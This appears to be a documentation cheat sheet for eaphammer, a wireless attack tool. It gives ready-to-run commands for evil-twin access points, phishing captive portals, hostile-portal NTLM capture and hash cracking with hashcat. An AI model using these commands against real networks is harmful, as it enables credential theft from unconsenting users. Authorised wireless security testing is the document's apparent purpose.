> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# eaphammer

> WPA Enterprise evil twin framework: captures MSCHAPv2 credentials, runs captive portals, and performs hostile portal attacks.

## Overview

eaphammer automates evil twin attacks against WPA Enterprise networks. It handles certificate generation, rogue AP setup, and credential capture. Also supports open network attacks via captive portals and hostile portals for NTLMv2 hash capture.

***

## Install

```bash theme={"dark"}
git clone https://github.com/s0lst1c3/eaphammer.git
cd eaphammer
pip3 install -r requirements.txt
```

***

## Usage

```
python3 eaphammer [options]
```

***

## Common Flags

| Flag                   | Description                           |
| ---------------------- | ------------------------------------- |
| `-i <iface>`           | Wireless interface                    |
| `--essid <SSID>`       | Target SSID to impersonate            |
| `--auth wpa-eap`       | WPA Enterprise authentication         |
| `--creds`              | Capture credentials                   |
| `--negotiate balanced` | Try multiple EAP methods              |
| `--cert-wizard`        | Interactive certificate generator     |
| `--captive-portal`     | Launch phishing captive portal        |
| `--hostile-portal`     | Launch Responder-based hostile portal |

***

## Generate Certificate

```bash theme={"dark"}
python3 ./eaphammer --cert-wizard
```

Import existing CA and server cert (for cloned cert attack):

```bash theme={"dark"}
python3 ./eaphammer --cert-wizard import \
  --server-cert /path/to/server.crt \
  --ca-cert /path/to/ca.crt \
  --private-key /path/to/server.key \
  --private-key-passwd whatever
```

***

## WPA Enterprise Rogue AP

Captures MSCHAPv2 hashes from clients that don't validate the server certificate:

```bash theme={"dark"}
python3 ./eaphammer -i wlan1 \
  --auth wpa-eap \
  --essid <TARGET-SSID> \
  --creds \
  --negotiate balanced
```

Extract hashes from log:

```bash theme={"dark"}
cat logs/hostapd-eaphammer.log | grep hashcat | awk '{print $3}' >> hashcat.5500
```

***

## Captive Portal Attack

Phishes credentials from clients connecting to an open network:

```bash theme={"dark"}
sudo killall dnsmasq
python3 ./eaphammer --essid <OPEN-SSID> --interface wlan1 --captive-portal
```

***

## Hostile Portal Attack

Serves a hostile portal that triggers automatic Windows NTLM authentication:

```bash theme={"dark"}
sudo killall dnsmasq
python3 ./eaphammer --essid <TARGET-SSID> --interface wlan1 --hostile-portal
```

Crack the captured NTLMv2 hash:

```bash theme={"dark"}
cat logs/Responder-Session.log | grep NTLMv2 | grep Hash | awk '{print $9}' > responder.5600
hashcat -a 0 -m 5600 responder.5600 ~/rockyou.txt --force
```
